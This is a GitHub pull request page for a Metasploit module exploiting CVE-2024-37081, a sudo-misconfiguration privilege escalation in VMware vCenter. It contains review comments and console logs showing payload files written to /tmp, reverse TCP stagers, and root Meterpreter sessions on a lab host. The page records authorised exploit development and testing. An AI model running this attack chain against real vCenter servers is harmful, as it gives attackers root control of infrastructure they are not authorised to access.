Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

vCenter Sudo LPE (CVE-2024-37081) #19402

Merged
merged 8 commits into from
Dec 5, 2024
Merged

vCenter Sudo LPE (CVE-2024-37081) #19402

merged 8 commits into from
Dec 5, 2024

Conversation

h00die
Copy link
Contributor

@h00die h00die commented Aug 20, 2024
edited
Loading

Module to exploit CVE-2024-37081. Also updates the ssh platform and vcenter libs to handle newer version of vcenter and photon OS

Due to the multiple methods, please see the Docs on how to test each one. If your install borks like mine, see workaround instructions as well. It took me 4 install attempts to get this to finish installing. ESXi installs failed, VMWare Workstation eventually succeeded but you need to fill in the networking information by hand during the VM creation.

@h00die h00die added the module label Aug 20, 2024
@h00die
Copy link
Contributor Author

h00die commented Sep 29, 2024

haven't forgotten about this, my ESXi server which should be vulnerable has a failing drive, so I'm waiting for the replacements to come in before attempting any more than absolutely necessary disk writes.

@h00die
Copy link
Contributor Author

h00die commented Nov 18, 2024

again, haven't forgotten about this, getting vcenter and having it install correctly was more of an effort than in previous versions. However, I have it (mostly? seems to have not completed install/setup, but seems functional enough) installed at this point and am making progress.

  1. pod user method is now working.
  2. Also updated platform to handle new versions of vcenter via ssh.

@h00die
Copy link
Contributor Author

h00die commented Nov 19, 2024

The operator method now works.

My install, as previously noted, is borked. I didn't have an admin user, or the dcli binary that is supposed to be on the box. During the 'setup' portion of the install (after first boot, after getting the yellow/black screen that you can change nic settings/enable ssh/enable shell, i went to the website and it says its Stage 1: Installed vmware-certificate-server-8.0.0.10000-10433816.x86_64.rpm. Reboot, nothing, can't get it to progress.

So i'm putting this up for review, i didn't test the last method, but it looks ok. Hopefully whoever tests this can get a working install. I'll keep trying, but not sure when i'll get around to it again (may be a week or two).

@h00die h00die marked this pull request as ready for review November 19, 2024 01:13
@h00die
Copy link
Contributor Author

h00die commented Nov 21, 2024

4th times a charm, see note in description about install on vmware workstation. all exploit methods tested, validated the check method as well.

@jheysel-r7 jheysel-r7 self-assigned this Dec 3, 2024
@jheysel-r7 jheysel-r7 added docs rn-modules release notes for new or majorly enhanced modules labels Dec 3, 2024
jheysel-r7
jheysel-r7 reviewed Dec 4, 2024
View reviewed changes
Copy link
Contributor

@jheysel-r7 jheysel-r7 left a comment

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Thanks for another great module with great documentation to go with it @h00die. I also had issues fully installing the application and the vulnerable users weren't created so the extra documentation was helpful.

Testing was expected for each of the vulnerable user/ group configurations. Just a couple minor suggestions.

Testing version 8.0.0.20519528

Pod

msf6 exploit(linux/local/vcenter_sudo_lpe) > run

[*] Started reverse TCP handler on 192.168.1.67:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] Exploitable version detected: 8.0.0.20519528
[+] User is vulnerable
[+] The target appears to be vulnerable. Version 8.0.0.20519528 and user (pod:["pod"]) are vulnerable
[*] Utilizing VMWARE_PYTHON_PATH exploitation method for pod user.
[*] Creating directory /tmp/appliance
[*] /tmp/appliance created
[*] Writing '/tmp/appliance/pPzp9qSV' (250 bytes) ...
[*] Launching exploit...
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3045380 bytes) to 192.168.1.102
[+] Deleted /tmp/appliance/pPzp9qSV
[+] Deleted /tmp/appliance/__init__.py
[+] Deleted /tmp/appliance
[*] Meterpreter session 5 opened (192.168.1.67:4444 -> 192.168.1.102:46654) at 2024-12-03 17:07:29 -0800

meterpreter > getuid
Server username: root
meterpreter > sysinfo
Computer     : vcenter.test.com
OS           : VMware Photon OS 3.0 (Linux 4.19.232-4.ph3)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter >

Operator1

msf6 exploit(linux/local/vcenter_sudo_lpe) > run

[*] Started reverse TCP handler on 192.168.1.67:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] Exploitable version detected: 8.0.0.20519528
[+] User is vulnerable
[+] The target appears to be vulnerable. Version 8.0.0.20519528 and user (operator1:["users", "operator"]) are vulnerable
[*] Utilizing PYTHONPATH exploitation method for operator group.
[*] Writing '/tmp/y0iQZJzY' (250 bytes) ...
[*] Launching exploit...
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3045380 bytes) to 192.168.1.102
[+] Deleted /tmp/y0iQZJzY
[+] Deleted /tmp/spwd.py
[*] Meterpreter session 7 opened (192.168.1.67:4444 -> 192.168.1.102:46908) at 2024-12-03 17:12:32 -0800


meterpreter >
meterpreter > getuid
Server username: root
meterpreter > sysinfo
Computer     : vcenter.test.com
OS           : VMware Photon OS 3.0 (Linux 4.19.232-4.ph3)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter >

Admin Group

msf6 exploit(linux/local/vcenter_sudo_lpe) > run

[*] Started reverse TCP handler on 192.168.1.67:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] Exploitable version detected: 8.0.0.20519528
[+] User is vulnerable
[+] The target appears to be vulnerable. Version 8.0.0.20519528 and user (admin:["users", "admin"]) are vulnerable
[*] Utilizing VMWARE_PYTHON_BIN exploitation method for admin group.
[*] Creating directory /tmp/appliance
[*] /tmp/appliance created
[*] Writing '/tmp/appliance/73kTyaqbNk' (250 bytes) ...
[*] Launching exploit...
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3045380 bytes) to 192.168.1.102
[+] Deleted /tmp/appliance/73kTyaqbNk
[+] Deleted /tmp/appliance/__init__.py
[+] Deleted /tmp/appliance
[*] Meterpreter session 3 opened (192.168.1.67:4444 -> 192.168.1.102:46328) at 2024-12-03 17:00:54 -0800

meterpreter > getuid
Server username: root
meterpreter > sysinfo
Computer     : vcenter.test.com
OS           : VMware Photon OS 3.0 (Linux 4.19.232-4.ph3)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > bg

modules/exploits/linux/local/vcenter_sudo_lpe.rb Outdated Show resolved Hide resolved
modules/exploits/linux/local/vcenter_sudo_lpe.rb Show resolved Hide resolved
modules/exploits/linux/local/vcenter_sudo_lpe.rb Show resolved Hide resolved
modules/exploits/linux/local/vcenter_sudo_lpe.rb Outdated Show resolved Hide resolved
@h00die
Copy link
Contributor Author

h00die commented Dec 4, 2024

Changes seem reasonable, it'll be a day or two until i can apply and test

@h00die
Copy link
Contributor Author

h00die commented Dec 4, 2024

had a free moment, implemented changes. Only tested against pod but still working.

jheysel-r7
jheysel-r7 approved these changes Dec 5, 2024
View reviewed changes
Copy link
Contributor

@jheysel-r7 jheysel-r7 left a comment

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Thanks @h00die! I gave them all one last test and everything was working as expected 🚀

msf6 exploit(linux/local/vcenter_sudo_lpe) > run

[-] Handler failed to bind to 192.168.1.65:4444:-  -
[*] Started reverse TCP handler on 0.0.0.0:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Version 8.0.0.20519528 and user (pod:["pod"]) are vulnerable
[*] Writing '/tmp/appliance/MAXOnji' (250 bytes) ...
[*] Launching exploit...
[*] Sending stage (3045380 bytes) to 192.168.1.102
[*] Meterpreter session 3 opened (192.168.1.65:4444 -> 192.168.1.102:42930) at 2024-12-04 18:04:53 -0800

[*] Exploit completed, but no session was created.
msf6 exploit(linux/local/vcenter_sudo_lpe) > sessions -i 3
[*] Starting interaction with 3...

meterpreter > getuid
Server username: root
meterpreter > sysinfo
Computer     : vcenter.test.com
OS           : VMware Photon OS 3.0 (Linux 4.19.232-4.ph3)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > bg

msf6 exploit(linux/local/vcenter_sudo_lpe) > run

[*] Started reverse TCP handler on 192.168.1.65:6464
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Version 8.0.0.20519528 and user (operator1:["users", "operator"]) are vulnerable
[*] Writing '/tmp/aiYdGGZ' (250 bytes) ...
[*] Launching exploit...
[*] Sending stage (3045380 bytes) to 192.168.1.102
[+] Deleted /tmp/aiYdGGZ
[+] Deleted /tmp/spwd.py
[*] Meterpreter session 7 opened (192.168.1.65:6464 -> 192.168.1.102:59130) at 2024-12-04 18:10:37 -0800


meterpreter >
meterpreter > getuid
Server username: root
meterpreter > sysinfo
Computer     : vcenter.test.com
OS           : VMware Photon OS 3.0 (Linux 4.19.232-4.ph3)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter >

msf6 exploit(linux/local/vcenter_sudo_lpe) > rexploit
[*] Reloading module...

[*] Started reverse TCP handler on 192.168.1.65:6464
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Version 8.0.0.20519528 and user (admin:["users", "admin"]) are vulnerable
[*] Writing '/tmp/appliance/NsmByF' (250 bytes) ...
[*] Launching exploit...
[*] Sending stage (3045380 bytes) to 192.168.1.102
[+] Deleted /tmp/appliance/NsmByF
[+] Deleted /tmp/appliance/__init__.py
[+] Deleted /tmp/appliance
[*] Meterpreter session 10 opened (192.168.1.65:6464 -> 192.168.1.102:59770) at 2024-12-04 18:23:50 -0800
meterpreter > getuid
Server username: root
smeterpreter > sysinfo
Computer     : vcenter.test.com
OS           : VMware Photon OS 3.0 (Linux 4.19.232-4.ph3)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter >

@jheysel-r7 jheysel-r7 merged commit e8911f9 into rapid7:master Dec 5, 2024
68 checks passed
@jheysel-r7
Copy link
Contributor

Release Notes

VMware vCenter Server < 7.0.3 update R and < 8.0.2 update D contains multiple local privilege escalation vulnerabilities due to misconfiguration of sudo. An authenticated local user with non-administrative privileges may exploit these issues to elevate privileges to root on vCenter Server Appliance. This adds a post module to exploit these vulnerabilities.

@h00die h00die deleted the vcenter_privesc branch December 5, 2024 11:01
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Reviewers

@smcintyre-r7 smcintyre-r7 smcintyre-r7 left review comments

@jheysel-r7 jheysel-r7 jheysel-r7 approved these changes

Assignees

@jheysel-r7 jheysel-r7

Labels
docs module rn-modules release notes for new or majorly enhanced modules
Projects
Metasploit Kanban
Status: Done
Milestone
No milestone
Development

Successfully merging this pull request may close these issues.
3 participants
@h00die @jheysel-r7 @smcintyre-r7